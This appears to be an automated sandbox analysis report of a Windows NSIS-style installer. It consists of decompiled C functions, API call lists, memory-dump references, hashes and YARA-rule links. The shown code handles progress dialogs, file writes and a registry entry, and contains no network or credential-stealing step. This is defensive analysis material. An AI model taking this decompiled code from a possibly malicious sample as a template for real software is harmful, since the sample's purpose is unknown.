                                                                                    0x00402725
                                                                                    0x00402737
                                                                                    0x0040273e
                                                                                    0x00402750
                                                                                    0x00402750
                                                                                    0x00402756
                                                                                    0x00402756
                                                                                    0x00402761
                                                                                    0x00402762
                                                                                    0x00402766
                                                                                    0x0040276a
                                                                                    0x00402770
                                                                                    0x00402770
                                                                                    0x00402777
                                                                                    0x00402164
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                    • GlobalFree.KERNEL32 ref: 00402725
                                                                                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                    • GlobalFree.KERNEL32 ref: 0040273E
                                                                                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3294113728-0
                                                                                    • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                    • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                    • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                    • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                    0x00404f0a
                                                                                    0x00404f16
                                                                                    0x00404f19
                                                                                    0x00404f1f
                                                                                    0x00404f2b
                                                                                    0x00404f2e
                                                                                    0x00404f31
                                                                                    0x00404f37
                                                                                    0x00404f37
                                                                                    0x00404f3d
                                                                                    0x00404f45
                                                                                    0x00404f48
                                                                                    0x00404f65
                                                                                    0x00404f69
                                                                                    0x00404f72
                                                                                    0x00404f72
                                                                                    0x00404f7c
                                                                                    0x00404f85
                                                                                    0x00404f91
                                                                                    0x00404f98
                                                                                    0x00404f9c
                                                                                    0x00404f9f
                                                                                    0x00404fb2
                                                                                    0x00404fc0
                                                                                    0x00404fc0
                                                                                    0x00404fc4
                                                                                    0x00404fc6
                                                                                    0x00404fc9
                                                                                    0x00000000
                                                                                    0x00404fc9
                                                                                    0x00404f4a
                                                                                    0x00404f52
                                                                                    0x00404f5a
                                                                                    0x00404f60
                                                                                    0x00000000
                                                                                    0x00404f60
                                                                                    0x00404f5a
                                                                                    0x00404f48
                                                                                    0x00404fd3

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                    • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                    • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                    • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                    • SendMessageA.USER32 ref: 00404F98
                                                                                    • SendMessageA.USER32 ref: 00404FB2
                                                                                    • SendMessageA.USER32 ref: 00404FC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2531174081-0
                                                                                    • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                    • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                    • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                    • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                    0x00402bdf
                                                                                    0x00402be1
                                                                                    0x00402be8
                                                                                    0x00402beb
                                                                                    0x00402beb
                                                                                    0x00402bf1
                                                                                    0x00000000
                                                                                    0x00402bf1
                                                                                    0x00402bf9
                                                                                    0x00402bff
                                                                                    0x00000000
                                                                                    0x00402c02
                                                                                    0x00402c09
                                                                                    0x00402c0f
                                                                                    0x00402c15
                                                                                    0x00402c17
                                                                                    0x00402c1d
                                                                                    0x00402c5b
                                                                                    0x00402c64
                                                                                    0x00000000
                                                                                    0x00402c69
                                                                                    0x00402c1f
                                                                                    0x00402c26
                                                                                    0x00402c37
                                                                                    0x00000000
                                                                                    0x00402c45
                                                                                    0x00402c26
                                                                                    0x00402c71

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                    • GetTickCount.KERNEL32 ref: 00402C09
                                                                                    • wsprintfA.USER32 ref: 00402C37
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0
                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                      • Part of subcall function 00402BB7: MulDiv.KERNEL32(00008000,00000064,?), ref: 00402BCC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                    • String ID: ... %d%%
                                                                                    • API String ID: 722711167-2449383134
                                                                                    • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                    • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                    • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                    • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                    0x004047e1
                                                                                    0x004047ee
                                                                                    0x004047f4
                                                                                    0x00404832
                                                                                    0x00404832
                                                                                    0x00404841
                                                                                    0x00404848
                                                                                    0x00000000
                                                                                    0x0040484a
                                                                                    0x004047f6
                                                                                    0x00404805
                                                                                    0x0040480d
                                                                                    0x00404810
                                                                                    0x00404822
                                                                                    0x00404828
                                                                                    0x0040482f
                                                                                    0x00000000
                                                                                    0x0040482f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                    • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                    • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                    0x00402b48
                                                                                    0x00402b56
                                                                                    0x00402b5c
                                                                                    0x00402b5c
                                                                                    0x00402b6a
                                                                                    0x00402b6c
                                                                                    0x00402b78
                                                                                    0x00402b7d
                                                                                    0x00402b7f
                                                                                    0x00402b7f
                                                                                    0x00402b8a
                                                                                    0x00402b9a
                                                                                    0x00402bac
                                                                                    0x00402bac
                                                                                    0x00402bb4

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                    • wsprintfA.USER32 ref: 00402B8A
                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                    • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                    • API String ID: 1451636040-1158693248
                                                                                    • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                    • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                    • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                    • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                    0x00402304
                                                                                    0x00402309
                                                                                    0x00402313
                                                                                    0x0040231d
                                                                                    0x00402320
                                                                                    0x00402330
                                                                                    0x0040233a
                                                                                    0x00402341
                                                                                    0x00402349
                                                                                    0x00402357
                                                                                    0x0040235b
                                                                                    0x00402366
                                                                                    0x00402366
                                                                                    0x0040236a
                                                                                    0x0040236e
                                                                                    0x00402374
                                                                                    0x00402379
                                                                                    0x00402379
                                                                                    0x0040237d
                                                                                    0x00402389
                                                                                    0x00402389
                                                                                    0x004023a2
                                                                                    0x004023a4
                                                                                    0x004023a4
                                                                                    0x004023a7
                                                                                    0x0040247d
                                                                                    0x0040247d
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaC26E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaC26E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaC26E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsaC26E.tmp
                                                                                    • API String ID: 1356686001-2625934076
                                                                                    • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                    • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                    • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                    • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA1837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 97%
                                                                                    			E73CA1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x73ca405c = _a8;
				_t77 = 0;
				 *0x73ca4060 = _a16;
				_v12 = 0;
				_v8 = E73CA123B();
				_t90 = E73CA12FE(_t42);
				_t87 = _t85;
				_t81 = E73CA123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E73CA123B();
					_t77 = E73CA12FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73CA1429(_t85, _t90, _t87,  &_v52);
								E73CA1266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73CA2EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73CA2F10(_t59, _t83, _t85);
						} else {
							_t48 = E73CA2F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73CA2D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73CA2E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73CA2D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                    0x73ca1837
                                                                                    0x73ca1841
                                                                                    0x73ca184a
                                                                                    0x73ca184d
                                                                                    0x73ca1852
                                                                                    0x73ca185b
                                                                                    0x73ca1864
                                                                                    0x73ca1866
                                                                                    0x73ca186d
                                                                                    0x73ca186f
                                                                                    0x73ca1872
                                                                                    0x73ca1876
                                                                                    0x73ca1882
                                                                                    0x73ca188b
                                                                                    0x73ca1890
                                                                                    0x73ca1893
                                                                                    0x73ca1899
                                                                                    0x73ca1899
                                                                                    0x73ca189c
                                                                                    0x73ca189f
                                                                                    0x73ca18a2
                                                                                    0x73ca1968
                                                                                    0x73ca1968
                                                                                    0x73ca196b
                                                                                    0x73ca19e5
                                                                                    0x73ca19e9
                                                                                    0x73ca19f8
                                                                                    0x73ca19fb
                                                                                    0x73ca1a03
                                                                                    0x73ca1a03
                                                                                    0x73ca1a03
                                                                                    0x73ca1a05
                                                                                    0x73ca1a05
                                                                                    0x73ca1a06
                                                                                    0x73ca1a06
                                                                                    0x73ca1a08
                                                                                    0x73ca1a0a
                                                                                    0x73ca1a10
                                                                                    0x73ca1a19
                                                                                    0x73ca1a2a
                                                                                    0x73ca1a35
                                                                                    0x73ca1a35
                                                                                    0x73ca19fd
                                                                                    0x73ca19e0
                                                                                    0x73ca19e0
                                                                                    0x73ca19e2
                                                                                    0x73ca19e2
                                                                                    0x00000000
                                                                                    0x73ca19e2
                                                                                    0x73ca19ff
                                                                                    0x73ca1a01
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca1a01
                                                                                    0x73ca19ed
                                                                                    0x73ca19f1
                                                                                    0x00000000
                                                                                    0x73ca19f1
                                                                                    0x73ca196d
                                                                                    0x73ca196d
                                                                                    0x73ca196e
                                                                                    0x73ca19d7
                                                                                    0x73ca19d9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73ca19db
